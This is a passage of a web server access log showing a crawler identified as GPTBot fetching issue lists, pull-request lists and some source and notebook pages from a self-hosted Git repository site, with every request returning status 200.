74.7.227.38] [Length 10026] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=open&type=all" -[17/Feb/2026:19:19:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=closed&type=all" -[17/Feb/2026:19:19:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=open&type=all" -[17/Feb/2026:19:19:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=closed&type=all" -[17/Feb/2026:19:20:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=open&type=all" -[17/Feb/2026:19:20:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=open&type=all" -[17/Feb/2026:19:20:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=closed&type=all" -[17/Feb/2026:19:20:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=closed&type=all" -[17/Feb/2026:19:20:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=closed&type=all" -[17/Feb/2026:19:20:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=latest&state=open&type=all" -[17/Feb/2026:19:20:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=closed&type=all" -[17/Feb/2026:19:20:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=open&type=all" -[17/Feb/2026:19:20:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:20:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=closed&type=all" -[17/Feb/2026:19:20:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=closed&type=all" -[17/Feb/2026:19:20:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" -[17/Feb/2026:19:20:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:20:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:20:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11363] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:20:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:20:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=open&type=all" -[17/Feb/2026:19:20:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=open&type=all" -[17/Feb/2026:19:20:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:19:20:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:19:20:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=closed&type=all" -[17/Feb/2026:19:20:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=closed&type=all" -[17/Feb/2026:19:20:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=open&type=all" -[17/Feb/2026:19:20:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=closed&type=all" -[17/Feb/2026:19:20:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=closed&type=all" -[17/Feb/2026:19:20:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=open&type=all" -[17/Feb/2026:19:20:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=open&type=all" -[17/Feb/2026:19:20:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:19:20:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:19:20:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=latest&state=open&type=all" -[17/Feb/2026:19:20:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10146] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=all&type=all" -[17/Feb/2026:19:20:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:19:20:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=open&type=all" -[17/Feb/2026:19:20:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:20:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:20:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=open&type=all" -[17/Feb/2026:19:20:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&sort=leastupdate&state=open&type=all" -[17/Feb/2026:19:20:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:20:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:20:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:20:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:20:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:20:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:20:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:20:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md?display=rendered" [Client 74.7.227.38] [Length 12113] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" -[17/Feb/2026:19:20:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md?display=source" [Client 74.7.227.38] [Length 11148] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" -[17/Feb/2026:19:20:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md?display=source" [Client 74.7.227.38] [Length 13565] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" -[17/Feb/2026:19:20:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" -[17/Feb/2026:19:20:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:20:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:20:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 